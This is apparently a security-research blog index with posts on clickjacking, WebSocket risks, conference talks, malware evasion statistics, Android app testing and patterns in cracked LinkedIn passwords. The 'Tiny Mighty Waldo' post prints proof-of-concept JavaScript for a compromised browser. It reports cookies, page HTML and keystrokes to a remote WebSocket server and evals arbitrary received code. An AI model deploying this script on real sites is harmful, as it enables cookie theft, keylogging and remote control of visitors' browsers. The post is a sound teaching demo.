All Posts in Security Labs

131 posts

Be Prepared: 4 Steps To Better Data Disaster Planning


Andrew Wild

While more than a month has gone by since the devastating Hurricane Sandy hit the East Coast, the photographs and videos of the incredible destruction will be hard to forget. During a disaster, the priority must be the safeguarding of life, but it is important to also think about safeguarding information. I can’t even begin to imagine how much data (in printed or electronic form) has been damaged by the floods and fires that resulted from this storm. We should all evaluate our own ability to secure critical information technology resources from the threat of another disaster.

Information management policies and procedures are important to ensure the confidentiality of an organization’s information. Proper disaster planning begins with documented information management policies and procedures, including identification, classification, handling and destruction.

Continue reading …

Clickjacking: An Overlooked Web Security Hole

Clickjacking is an attack that tricks a web user into clicking a button, a link or a picture, etc. that the web user didn’t intend to click, typically by overlaying the web page with an iframe. This malicious technique can potentially expose confidential information or, less commonly, take control of the user’s computer. For example, on Facebook, a clickjack can lead to an unauthorized user spamming your entire network of friends from your account.

We’ve known about clickjacking, also called “UI redress attacks,” for years now, as they were originally described in 2008 by Robert Hansen and Jeremiah Grossman. There are countermeasures that web sites can implement to protect against clickjacking attacks, such as framebusters, the X-Frame Option and some client-side plug-ins that can be installed in the browser. However, recent studies have shown that web sites may not be taking this vulnerability seriously – or at least they aren’t attempting to protect their web sites from clickjacking.

Continue reading …

National Cyber Security Awareness Month Encourages Americans to STOP. THINK. CONNECT.

October is one of my favorite months of the year. The hot humid days of summer change to cool, crisp days and chilly nights. We have football to watch and beautiful fall foliage to enjoy. October is also the month of the year when everyone, not just information security professionals, reflects upon cyber security because October is National Cyber Security Awareness Month (NCSAM) (http://www.staysafeonline.org/ncsam/) .

Continue reading …

Hacking Web Apps

In between writing lines of code, I try to twist my fingers into typing more human-friendly output. In this case, it’s a new book on web security called, simply enough, Hacking Web Apps. It explains several web security weaknesses and vulnerabilities, from HTML injection to protecting passwords, to design issues that lead to CSRF, clickjacking and more.HWA

Most well-known web compromises tend to stem from HTML injection (cross-site scripting, or XSS) or SQL injection. After all, those vulns tend to be easy-to-find and deliver high-impact results like site defacement or stealing millions of passwords. By now, we have tools like sqlmap and BeEF that strip most of the mystery from how these vulns are exploited. Ask someone experienced in web security how easy it is to find XSS and they’ll probably call it child’s play. Check out the OWASP Top 10 and you’ll see XSS detectability rated as easy.

But HTML injection continues to infest sites regardless of their size or sophistication, which seems to imply that its detectability might not be so easy after all. Maybe XSS remains unknown to the huge population of developers building web sites, or maybe the increasing complexity of sites makes security exponentially harder to maintain. Maybe it’s hard to evaluate the tens of millions of sites on the web when there might not even be tens of thousands of people capable of doing it well. At the very least, more education should help.

The book explains how XSS shows up in unexpected places, giving you hints on what to look for in your own site as well as things to consider when coding countermeasures (hint: regular expressions are tough to get right). Even sites with well-informed developers and experienced security teams have this problem.

xssAnd those unexpected places? The HTML injection chapter hacked Amazon right from the printed page. A Gutenberg Press Injection attack, if you will.

Then there are hacks like cross-site request forgery (CSRF) and clickjacking that blur the line between tools and manual testing. The search pages for Bing, Google and Yahoo are all, strictly speaking, vulnerable to CSRF. Manual analysis is required to assess the relative risks in such cases and consider whether certain threats are worth addressing. This is the engineering side of security: weighing trade-offs between performance, complexity, threats and risks. Learning about the kinds of design problems that lead to insecure sites helps you avoid them in the future.

Different design problems are covered in the book, as well as the mistakes that happen when good design is betrayed by poor implementation. What if a site lets you apply a discount code multiple times? What if it lets you modify the email recipient for password reset instructions? What if it encourages you to create a long passphrase, but only uses the first eight characters? These sorts of problems are harder, if not impossible, to find with any automated tool. This is why it’s good to stay informed about web security beyond the simple XSS and SQL injection vulns we hear about so often.

And if you’re still unconvinced about the importance of web security, consider this paragraph from the introduction:

On the web information equals money. Credit cards clearly have value to hackers; underground "carder" sites have popped up that deal in stolen cards; complete with forums, user feedback, and seller ratings. Yet our personal information, passwords, email accounts, on-line game accounts, and so forth all have value to the right buyer, let alone the value we personally place in keeping such things private. Consider the murky realms of economic espionage and state-sponsored network attacks that have popular attention and grand claims, but a scarcity of reliable public information. (Not that it matters to web security that "cyberwar" exists or not; on that topic we care more about WarGames and Wintermute for this book.) It’s possible to map just about any scam, cheat, trick, ruse, and other synonyms from real-world conflict between people, companies, and countries to an analogous attack executed on the web. There’s no lack of motivation for trying to gain illicit access to the wealth of information on the web, whether for glory, country, money, or sheer curiosity.

Hacking Web Apps aims to give you a feeling for how hackers exploit web sites along with examples and details about each vuln’s inner workings. Whether you’re developing a web application, or are just curious how hackers take apart web sites, there should be something in there for you.

Would You Let Your Grandma Use WebSockets?

Your grandma has been coding web sites since 1994, and has lately been getting deep into HTML5. But as her web app security advisor, would you recommend she code with WebSockets? Let’s look at the research we did for our talk on Hacking with WebSockets presented at Black Hat USA 2012, and see if we can help grandma out.Grandma’s Knitting App

As defined in the RFC 6455 spec, “the WebSocket Protocol enables two-way communication between a client running untrusted code in a controlled environment to a remote host that has opted-in to communications from that code.” By providing a nice mechanism for low-latency, two-way communication, it removes the need for workarounds that force persistent connections via the inherently non-persistent HTTP protocol via polling. You can think of WebSockets as a replacement for the “x” in Ajax, but with some additional features. At first glance, it’s just what grandma needs to build out her super fast interactive knitting application.

“Old” Security Still Matters

Web apps that use WebSockets are susceptible to all existing issues that "old" Web apps had. Things like XSS and MITM are still as important as ever. Any attacker that can sniff “http:” can also sniff “ws:”, meaning they can use the same methods to intercept the traffic or inject into the traffic. So WebSockets is just a new way to encounter the same security problems you see with HTTP.

Mixed Content

Although it should be impossible to mix “ws:” with “https:” according to the RFC 6455, which is a nice improvement, not all of the browsers adhere to that rule. For now, only Firefox implements this policy. This is similar to having HTTP resources loaded within an HTTPS page. In some cases, the insecure portion of the web application may compromise the whole system.

DoS

Another old friend, denial of service (DoS), is also possible with WebSockets. WebSockets typically have a higher connection limit than HTTP, so it’s possible for a malicious web site to exhaust the browser by grabbing the maximum number of WebSockets connections, which could crash your browser. All major browsers are known to have that limit set to a number as high as 900 to 3000, and only Firefox limits connections to 200.

It is also possible for a client to DoS a server by requesting a large number of connections from the server. Attacks like SlowLoris strive to maintain persistent connections, thus draining server resources. This happens automatically with WebSockets, which keep the connection alive by design.

IPS / IDS / DLP and Masking

The WebSocket protocol implements data masking, intended to prevent proxy cache poisoning. While useful, data masking also has a dark side: masking inhibits security tools from identifying patterns in the traffic. Because data loss prevention (DLP) software and firewalls are typically not aware of WebSockets, they can’t do data analysis on WebSocket traffic and therefore can’t identify malware, malicious JavaScript and data leakage in WebSocket traffic.

Malicious users can also bypass security devices by establishing covert channels inside legitimate WebSocket data frames. Reserved flags, length representations and even the mask values can be used to move data to and from the client even when standard protection mechanisms are in place.

For an example of how easy it is to communicate with a compromised browser via WebSockets, see The Tiny Mighty Waldo.

Inspection / Manipulation Tools

In order to understand Websockets security support by sniffing and traffic manipulation, you need tools. For now there is very limited support of WebSockets on this front. Wireshark, Fiddler and Chrome Developer Tools are some of the first to implement read-only support for WebSocket data frames. ZAP is working on comprehensive support, complete with data frame fuzzing. But until these support more sophisticated features, developers don’t have much help creating secure WebSocket applications.

Deployment Recommendations

Since WebSockets is missing security features like HTTP cookies and form-based authentication, secure deployment is going to be a mix of HTTP and WebSockets, or something entirely new.

We are continuing to research the details of the protocol and working out better approaches to implement a robust and secure system using WebSockets, and hope to publish more on this topic. In the meantime, these two simple suggestions will go a long way to keep your grandma safe:

  1. Adopt WebSockets if you need higher throughput, full duplex communication or lower latency.
  2. Remember security basics (authentication/authorization, session management, state handling), as WebSocket protocol isn’t aware of these.

Black Hat & DEF CON 2012 Redux

The week before last we were at Black Hat USA 2012 and DEF CON 20 and besides the Qualys talks at BH (Web Application Firewall, Malware Analysis, Websockets) and DEF CON (Dwarf Programming) there were a number of great talks at BH and DEF CON that the team enjoyed. The following list shows their individual favorites:

  • @DEF CON:  Hacking [Redacted] Routers – FX and Gregg, Recurity Labs
    FX and Gregg dive into the security of (smaller…) Huawei routers and are transported back 15 years in time, as they easily find buffer overflow vulnerabilities, abundant use of “ sprintf”, in-house-written implementations of SSH and memory allocation, etc. This, paired with the fact that the researchers failed to find a single security advisory published by Huawei, left the audience with serious doubts to the security of Huawei routers. Huawei has already started to respond to the allegations and it will be interesting to see if the same problems are present in enterprise class Huawei routers. Presentation
    = Favorited by Wolfgang Kandek
  • @BlackHat:  Targeted Intrusion Remediation:  Lessons From The Front Lines – Jim Aldridge
    Jim Aldridge provided an outstanding overview of targeted intrusions including the lifecycle of a targeted attack, remediation planning for targeted attacks,  incident response and strategic planning for targeted intrusions. In addition to the overview of the targeted attack lifecycle, several specific recommendations were provided. Two of my favorite suggestions were to enhance logging/monitoring, and IR team preparation (table top exercises). Presentation and Paper
    = Favorited by Andrew Wild
  • @DEF CON: Defeating PPTP VPNs and WPA2 Enterprise with MS-CHAPv2 – Moxie Marlinspike, David Hulton
    Enterprises reliant on Active Directory with investments in large-scale 802.11 wireless deployments typically leverage 802.1X, PEAP and MS-CHAPv2 as part of their supplication authentication process. Creating its basic framework is relatively wizard-driven and the properties to implement are made easier for Microsoft-centric organizations. However, the common reliance on MS-CHAPv2 as part of the inner-identity method now means that the potential of user credential extrapolation is now even more practical due to the increased predictability inherent in MS-CHAPv2’s characteristics. David Hulton reduced the length of attack time based on dedicated, expensive hardware (FPGAs, etc.) which by itself makes brute-forcing the passwords costly, but by simply enhancing CloudCracker to leverage it as well as using the free chapcrack tool, it’s now a cheap SaaS solution available to anyone with a simple 802.1X authentication handshake capture. More info from Moxie Marlinspike on this talk.
    = Favorited by Kimi Ushida
  • @DEF CON: Black Ops – Dan Kaminsky
    Computers and The Internet have problems, and Dan has some solutions he wants us all to try out. He wants us to eliminate timing attacks, create better random numbers, and enable our developers to create safe code on the first try. He also thinks we can route around internet censorship, and he demonstrates a technique to perform simple port scans at unprecedented speeds. All of this and more in a compelling, unified, and entertaining package. Presentation and more info from Dan Kaminsky.
    = Favorited by Lucas Sweany
  • @BlackHat: Find Me in Your Database: An Examination of Index SecurityDavid Litchfield
    David Litchfield discusses ways to attack Oracle Databases via specially crafted indexes, triggers and tables. In some cases, these attacks take advantage of the fact that the bulk of database management itself is built in PL/SQL, which can still be susceptible to SQL injection attacks.
    = Favorited by Matt Wirges
  • @BlackHat: Owning Bad Guys {and Mafia} with JavaScript Botnets – Chema Alonso
    Chema Alonso sohows us an excellent demostration of a MITM attack performed in a very simple manner. While the presentation does not have anything super-technical or novel, it is captivating. Chema created an open proxy that is the MITM implementor, and it looks like people will trust the proxy. All kinds of traffic good/bad legit/criminal was seen by this experiment.  The bottom line: do not to trust open proxies. He also had a very unique, fun way of presenting. Presentation and Paper
    =Favorited by Vaagn Toukharian
  • @BlackHat: Ghost Is in the Air(traffic)Andrei Costin
    Andrei Costin discusses ADS-B (in)security from the practical angle, presenting the feasibility of attacks as well as techniques that potential attackers could use to play with generated/injected air-traffic and as such potentially opening new attack surfaces onto AirTrafficControl systems. Presentation and Paper
    = Favorited by Sergey Shekyan
  • @BlackHat: Automated Package Clone Detection – Silvio Cesare plus PRNG Pwning Randown Number Generators – George Argyros and Aggelos Kiayias
    These talks from university level researchers showed real world applications:
    • Silvo demonstrates how to design an automatic classficiation engine and lower its false positive rate, applied to detect code clones; copies of an external librarie’s code in a project instead of a clean link to that library. The result of his work is the discovery of several (previously) unknown Debian Linux vulnerabilities, and several Fedora Linux vulnerabilities as well.
    • George Argyros and Aggelos Kiayias focus on PHP randomness vulnerabilities. Through the usage of different attacks, going from the time synchronization (at millisecond level) with the victim’s up to the solving of linear equations (state recovery attack),  they demonstrate practical exploitation of password reset mechanisms of popular PHP applications – More Info

    = Favorited by Francois Pesce

  • @BlackHat: Don`t Stand So Close To Me: An Analysis of the NFC Attack Surface – Charlie Miller
    Charlie Miller, famous for his first public remote exploit for iPhone, demonstrated his research on the near Field Communications(NFC) technology. The talk discussed some of the protocols for NFC and Charlie shared some results he obtained from fuzzing these protocols. Many latest phones from Google and Samsung are shipped with NFC built-in and Charlie demonstrated how he could basically own a phone just by touching or getting close to it – Presentation and Paper
    = Favorited by Bharat Jogi
  • @BlackHat: Adventures in Bouncerland – By Nicholas Percoco and Sean Schulte
    Nicholas and Sean talk about how they managed to fool Google’s Bouncer system by submitting a completely legitimate app called "SMS Blocker" in Google Play’s market and then slowly modifying the app to include malicious behavior and functionality that had nothing to do with "blocking SMS". It was interesting to know how the app was updated over 10 times to access data, photographs, call list as well as turn the phone into a zombie to launch DDOS attacks and Bouncer was unable to detect any of the malicious activity going on. Paper
    = Favorited by Prutha Parikh

The Tiny Mighty Waldo

Waldo is a proof-of-concept educational demo written for Black Hat USA 2012 that shows how easy it is to start using WebSockets, since most major browsers have support for them. We put some security context in it, and demonstrated how easy it is for an attacker to communicate via WebSockets with a compromised browser.

The WebSocket protocol allows users to bypass security devices like firewalls since the majority of them are not aware of it, and therefore do not have knowledge on how to process WebSocket data frames. In a follow-up post, we’ll describe these security implications in more detail.

Waldo Demo

Waldo is small, under 200 lines of C++ program, and it communicates with a similarly small bit of JavaScript, victim.js, that runs on the compromised browser. It’s a nice demo, but by design it’s not complicated — it was built in a matter of hours.

Waldo is built on top of the websocketpp server, an RFC6455-compliant WebSocket library, and shows how to code with WebSockets on both ends of the pipe: via C++ on the server-side and via the JavaScript API in the browser.

The demo assumes that the victim.js Javascript code, which listens for commands from waldo, has already been injected into a compromised web page.

Best viewed full-screen

Waldo Server

The waldo server code is very straightforward, and is based on the stateless websocketpp's echo_server example. It subclasses a server handler that and defines on_message callback (we impelement text version only, try impelementing binary version yourself), which would be called once a complete websocket frame is received:

class waldo_server_handler : public endpoint_type::handler {
...
  void on_message(connection_ptr con, websocketpp::message::data_ptr msg) {
    ...
  }
};

Compromised Browser

This demo assumes that Waldo can access a web site that has already been compromised and has had victim.js injected into it. If you also want Waldo to be able to make a browser render screenshots of the compromised web site, then it should also have screenshot.js injected into it.

To make sure script is running even if a user navigated away to another page within the same domain, we move existing content with malicious script to a hidden frame and reload the page in another frame. This technique won’t work if the server has any kind of anti-framing countermeasures like X-Frame-Options, or a frame-buster:

if (window.parent && window.parent.document.getElementById('_waldo')) {
  return;
}
//  easy way to reload content into an iframe I found at 
//  http://blog.kotowicz.net/2010/11/xss-track-how-to-quietly-track-whole.html
$('body').children().hide();
$('<iframe id=_waldo>')
  .css({
    position: 'absolute',
    width: '100%',
    height: '100%',
    top: 0,
    left: 0,
    border: 0,
    background: '#fff'
  })
  .attr('src', window.location.href)
  .appendTo('body');

Then the script establishes a WebSocket connection with the waldo server:

if("WebSocket" in window) {
  ws = new WebSocket(url);
}

and either executes predefined functions mapped to the commands received from the server, or evaluates incoming raw JavaScript:

function recv_from_server(e) {
  var incoming = JSON.parse(e.data); 
  console.log("Server: "+incoming.cmd);
  if (incoming.cmd == "screenshot") {
    send(data_scrn);
  }

  else if (incoming.cmd == "cookies") {
    cookie = getCookie();
    send(cookie);
  }
  else if (incoming.cmd == "html") {
    html = getDom();
    send(html);
  }
  else if (incoming.cmd == "activate klogger") {
    if(window.onkeyup == null) {
      ks = '';
      top._waldo.document.onkeyup=klogger;
      send("klogger activated");
    }
  }
  else if (incoming.cmd == "keystrokes") {
    send(ks);
    ks = '';
  }
  else if (incoming.cmd == "de-activate klogger") {
    window.onkeyup=null;
    ks = '';
    send("klogger de-activated");
  }
  else if (incoming.cmd == "crash") {
    crash();
    send("ready(but may be alreasy dead)");
  }
  else if (incoming.cmd == "dos") {
    DoS(incoming.arg1, incoming.arg2);
    send("DoS launched");
  }
  else if (incoming.cmd == "customjs") {
    eval(incoming.arg1);
    send("executed");
  }

  else {
    send("ready");
  }
}

Waldo Dependencies and Installation

Waldo should work on most Linux platforms, as well as on OS X.

There are several dependencies to compile the waldo.cpp file:

websocketpp WebSocket library

– websocketpp requires Boost to successfully compile. Boost version 1.47.0 is recommended.

Boost could be installed either by compiling it from the source as described in the tutorial, or through your favorite package installation tool like Brew, MacPorts, APT, etc.

Once boost is installed, get websocketpp from github:

git clone https://github.com/zaphoyd/websocketpp.git

make

make install

After installing the websocketpp library, just download the waldo.zip, extract it, review the common.mk file to make sure you have the correct paths to boost and websocketpp, and type make.

There are advanced tools, like BeEF and XSSChef, that implement very rich functionality around browser exploitation, but we hope that waldo would be helpful for those who wants to experiment on their own.

How Malware Employs Anti-Debugging, Anti-Disassembly and Anti-Virtualization Technologies

Last week at Black Hat USA 2012, we published the first results of an ongoing security research project called Dissect || PE in our session titled "A Scientific (but Non-Academic) Study of How Malware Employs Anti-Debugging, Anti-Disassembly and Anti-Virtualization Technologies".

Dissect || PE is founded on a database of 30 million current malware samples and offers both static (i.e. scanning of the malware’s code) and dynamic (i.e. running of the malware under observation) analysis engines.

Static Analysis

The presentation focused on the static analysis side and introduced the results of 51 static tests run against a representative cross-section of 4 million malware samples. The tests were focused on detection evasion attempts by the malware and divided into 4 groups:

  1. Detection of virtual machines, i.e. do not run under VM or change behavior to non-malicious
  2. Techniques to avoid disassembly, i.e. prevent a security researcher from reverse-engineering a malware sample by looking at it assembly language source code
  3. Methods of preventing debugging
  4. General obfuscation methods, i.e. disrupting the analysis process by calling functions in unorthodox ways

Results

The results clearly showed that close to 90% (88.96) of the analyzed malware employs at least one of the listed evasion technologies, and that anti-virtualization attempts lead the pack by a wide margin:

anti-vm-stats

For more data on this fascinating world of evasion techniques, please take a look at both the full presentation and detailed technical paper. Sample code for the evasion techniques is available at: http://www.github.com/rrbranco/blackhat2012.

Feedback

The feedback at the conference itself was excellent, but we welcome your opinions on what data you would like us to focus on.

If you are a security researcher, we designed the Dissect || PE analysis engines with you in mind. They are extensible though simple plugin mechanisms, which gives you an opportunity to run your detection algorithms against this large sample database and publish the results in the research portal.

Please get in touch with us through comments in this blog post or email at: rbranco *noSPAM* qualys.com.

Android Security Evaluation Framework: ASEF

Have you ever looked at your Android applications and wondered if they are watching you as well?

ASEF ArchitectureWhether it’s a bandwidth-hogging app, aggressive adware or even malware, it would be interesting to know if they are doing more than what they are supposed to and if your personal information is exposed. Is there really a way to automatically evaluate all your apps, even hundreds of them, to harvest their behavioral data, analyze their run pattern, and at the same time provide an interface to facilitate a vast majority of evolving security tests with most practical solutions?

To answer these questions, I created the Android Security Evaluation Framework (ASEF) to perform this analysis while alerting you about other possible issues. Use it to become aware of unusual activities of your apps, expose vulnerable components and help narrow down suspicious apps for further manual research.

ASEF Framework

The framework takes a set of apps, either pre-installed on a device or as individual APK files, and migrates them to the test suite which runs through test cycles on a pre-configured Android Virtual Device (AVD). The technique is to simulate the entire lifecycle of an Android app on an Android device (virtual/physical) and collect data while triggering behavioral aspects of it. In simple words, download an Android app from an internet, install it on an Android device, launch it and mess with it (e.g clicking different buttons, scrolling up/down, swipe etc..) While doing so, collect an activity log using adb (Android debug bridge utility which is available as a part of an Android SDK) and network traffic using tcpdump (a widely used packet capturing tool).

Behavioral Analysis

During such a simple yet thorough approach of performing a behavioral analysis for various apps, interesting results were found about apps leaking sensitive information like IMEI, IMSI, SIM card or a phone number of a device. Some malicious apps might just send this data in clear text over the Internet and are much easier to be caught by analyzing collected behavioral data. However some malicious apps can be sophisticated enough to detect the default settings of a virtual Android device and might behave differently in such settings. In order to overcome such limitations, a virtual device can be custom built by fine-tuning the kernel and also altering default settings to emulate a real device or it can be replaced by a physical Android device.

Open Source

ASEF is now available as open source at http://code.google.com/p/asef/. With it, users can gain access to security aspects of android apps by using this tool with its default settings. An advanced user can fine-tune this, expand upon this idea by easily integrating more test scenarios, or even find patterns out of the data it already collects. ASEF will provide automated application testing and facilitate a plug and play kind of environment to keep up with the dynamic field of Android Security.

At Black Hat

If you are at Black Hat USA 2012 and/or B-Sides Las Vegas, come to my talk where I discuss the test cycles and results so far. And if not, read the A S E F Getting Started guide for an architectural overview of the framework and more details on the motivations behind the project. 

Meanwhile, give ASEF a try and help improve this project with your comments, feedback and contributions.

Discovered Patterns in Numeric Passwords Raise New Questions

In my previous article, I showed how a powerful tool like John The Ripper can crack a few million passwords mainly using a dictionary attack strategy.

As pointed out by Jeremi Gosney on the Security Nirvana blog, it is impossible to write a “Top Passwords” post for the LinkedIn breach because the leaked list only contained unique hashes. That being said, through the analysis of password patterns and the discovery of a few common tendencies, we can see how bad humans are at random password generation by focusing on a group of passwords easily cracked by an incremental attack: numbers.

Numeric Passwords

Six Digit Password Heat MapNumbers are easy to crack, and out of the 6.5 million passwords exposed in the recent LinkedIn breach, I was able to crack just over 200,000 numeric passwords (i.e., passwords consisting only of the numbers 0 through 9). Of those 200,000 numeric passwords, 93,340 contained 6 digits and 55,027 contained 8 digits – roughly 75% of all numeric passwords found.

Choosing a purely numeric password is usually a horrible idea, because even for 8-digit numeric passwords, it only takes a few seconds to generate the SHA-1 hashes for the 100 million (10^8) possible combinations. By comparison, using a combination of lower-case and upper-case characters plus numbers and 10 special characters yields 7.2 * 10^14 possible combinations (i.e., it takes 7.2 million times longer to generate hashes of all possible combinations). 

One of the wonderful properties of numbers is how easily they can be represented graphically. As we can’t know which passwords are duplicates, we focused on the distribution of the numerical passwords and chose a method to enhance the patterns.

In the heat map shown above, the 93,340 6-digit passwords that I cracked are represented. The x-axis represents the first two digits from 00 to 99, and the y-axis represents the last four digits from 0000 to 9999.  In other words, each column stands for a single prefix (from the left to the right 00-99) and each row represents a “window” of 100 suffixes (from the bottom 0000-0099 to the top 9900-9999). Thus, each pixel of the graphic represents 100 possible passwords.

For example the lower left square represents 000000 through 000099; the square to the right of it represents 010000 through 010099; and the top left square represents 009900 through 009999. The color of each square represents the number of cracked passwords within that range with blue representing very few cracked passwords in that range, and red representing many in that range, as shown in the legend below. Note that the color distribution in the heatmap is not uniform — color values are shifted based on other values in the same row and column to make the patterns more obvious. Heat maps were generated using R.

Heat Map Legend

Patterns Extracted from Numeric Passwords

If users selected their passwords randomly, then the passwords would be distributed evenly with each pixel representing about 9 passwords (93,340 divided by 10,000 squares for our 100 x 100 heatmap). In this case the heatmap would be a uniform color with some “noise.” However, users don’t select passwords randomly, so we can discern areas with higher and lower concentrations of passwords.

First we spot some boxes on the bottom left corner and two lines: one vertical, one horizontal, which I will discuss later. We clearly see a bottom-left-top-right diagonal that represent the passwords composed from three repetitions of the same two digits : 313131, 424242, etc. If we look into the raw data, we can see that all 100 of them are present (and we can guess that some of them are probably used by more than one LinkedIn user). At this point, any attacker can guess that this pattern is also used for letters, as well (for example, by analyzing the cracked non-numeric passwords, I found 474 of the 676 (26^2) possibilities of lowercase letters like ababab using this pattern).

Six Digit Password Heat Map with Highlighted RegionsLet’s take a look at the areas and lines in the bottom left zone of the heatmap, and let’s add some color in order to identify them:

In the green area, we can notice all the dates represented as DDMMYY. If we look closer, we can also see the months (rows) with less than 31 days have darker pixels on the 31st column. This also holds true in the diagonally symmetrical red area, which represents MMDDYY. With those two date formats, we can find nearly 40% of the passwords in their corresponding areas, although these cover only 6% of this heat map. The horizontal pink line is composed of numbers finishing with a 4 years digits of the 20th century (i.e., 19xx), and the vertical pink line symbolize the numbers beginning with 1955 up to 1998. The yellow area corresponds to the dates represented as YYMMDD from 1955 to 1999.

When any password specialist sees these patterns through the cracked list, it then becomes obvious to generate a dictionary of dates as more complex strings like “November 4, 2011,” which would have been harder to crack in an incremental mode. Several tens of thousands passwords in that leak are indeed various date formats in various languages.

Spotting Password Singularities While Watching Numbers

It is also possible to represent 8-digit numeric passwords in a heat map, as shown below. The x-axis represents the first four digits from 0000 to 9999, and the y-axis represents the last four digits from 0000 to 9999. To keep the graphic to a reasonable size, we show a 200 x 200 pixel heat map, where each column represents a “window” of 50 prefixes and each row represents a “window” of 50 suffixes. Each pixel of the heatmap then represents 2500 possible passwords.

Eight Digit Password Heat Map with Highlighted RegionsAgain, the obvious diagonal pattern is any password chosen as a repetition of four decimal digits: 42154215, 36713671, etc. This is also a good pattern for cracking alphanumeric passwords: more than 19,000 passwords, e.g. abc1abc1, follow this pattern in the LinkedIn data.

The yellow area displays every password of the format DDMMYYYY for each year from 1900 to 1999; the small green area shows every password of the format YYYYMMDD. These two little areas contain 25% of the 8-digit numeric passwords.

As I was looking at this heat map, I noticed an abnormal line in the upper right corner (the little pink box on the graphic). At first, I thought it was a 69xxxxxx pattern (users’ affinity for the number 69 is pointed out in a paper on customer-chosen banking PINs), but it wasn’t. After a closer look at the actual values from the cracked passwords, I found a weird range of nearly complete sequential list of 423 numbers from 67108865 to 67108899 and 67109000 to 67109397. At the time of writing this post, I’m waiting for the validation from LinkedIn that the accounts related to this range may have been automatically generated in some way.

Again, focusing on the results of an easy incremental attack of the passwords, we can discover various strategies (word repetitions, date generations, etc.) that can be reused to crack tens of thousands of more passwords, including strong ones, without using rainbow tables or a powerful CPU/GPU. At the same time, we can find that passwords sometimes reveal some secrets (apart from pure demographic analysis that could have been done on birth dates of LinkedIn users), like that bizarrely long list of numerical passwords.

New Questions

The obvious conclusion, which has been repeated many times elsewhere, is that humans are not good at generating secure passwords. No matter how clever we think we are, we always pick passwords based on some reasoning, like the dates or repetition patterns shown above, and that reasoning can be discerned and used to crack the password. Only truly random passwords are safe from this type of method.

Personally, I’m interested in the person(s) who stole and released the LinkedIn data. Hypothetically, if we are able to unveil information from the released password hashes, and if the hashes that have been “marked” with five 0’s in their beginning are those already cracked by an initial hacker, I am wondering if someone would be able to make a profile of this person by looking at the success rate of different hacking methods such as rainbow tables, incremental mode, dictionary attacks and so forth.